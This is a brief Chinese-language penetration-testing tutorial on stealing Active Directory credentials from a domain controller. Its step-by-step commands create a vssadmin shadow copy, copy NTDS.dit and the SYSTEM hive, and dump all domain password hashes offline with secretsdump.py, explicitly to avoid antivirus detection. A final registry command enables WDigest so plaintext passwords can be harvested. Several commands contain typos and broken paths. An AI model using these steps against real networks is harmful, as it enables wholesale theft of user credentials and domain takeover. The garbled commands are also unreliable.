域滲透之獲得域控服務器的NTDS.dit文件

前言：

ntds.dit是主要的AD數據庫，存放在c:\windows\NTDS\NTDS.dit，包括有關域用戶，組和成員身份的信息，它還包括域中所有用戶的密碼哈希值，爲了進一步保護哈希值，使用存儲在SYSTEM註冊表配置單元中的密鑰對這些哈希值進行加密。
因爲這兩個文件屬於系統特殊文件，不能直接複製粘貼，所以需要用特殊的方式來複制粘貼。
當我們拿到域控的權限後，我們可以跑域內所有的hash值，但是如果在線跑hash的話，是比較容易被殺軟等軟件阻止的，所以我們可以將NTDS.dit文件和SYSTEM複製到本地進行遍歷。

利用方式:

利用vssadmin命令創建C盤卷影拷貝：
第一步：打開cmd執行命令:vssadmin create shadow /for=C：
此時卷影副本卷名就是域控的C盤。

第二步：執行copy \\?\GLOBALRO0T\Device\HarddiskUo lumeShadowCopy5\windows\NTDS\NTDS.dit C:\Users 即可將ntds.dit文件拷貝到C盤的Users用戶下。

第三步：執行 copyt \\?\GLOBALRO0T\Device\HarddiskUo lumeShadowCopy5\windows\System32\config\SYSTEM C:\Users 將SYSTEM文件複製到C盤Users下

此時在C:\Users下就可以看到我們複製出來的2個文件了。

第四步：利用impacket工具包的腳本文件secretsdump.py來進行離線破解，命令如下：
python secretsdump.py -ntds ~/impacket-master/examples/ntds.dit -system ~/impacket-master/examples/SYSTEM LOCAL
成功遍歷出所有域內hash。

總結：

上面介紹的複製hash文件的方法，vssadmin命令是域控系統中自帶的，當然了除了這種方式還有其他很多方式來離線抓取hash的。

那麼明文密碼的抓取，windows8.1以上版本或者打過補丁KB2871997的機器，lsass中不會存儲密碼，如果想抓取明文，可以將註冊表 HKLM（HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control securityProviders\Wdigest下的UselogonCredential設置爲1，
類型爲DWORD32。

也可以直接使用命令：
Reg add HKLM\SYSTEM\CurrentControlSet\Control\securityProviders Wdigest/v UselogonCredential/t REG_DWORD/d 1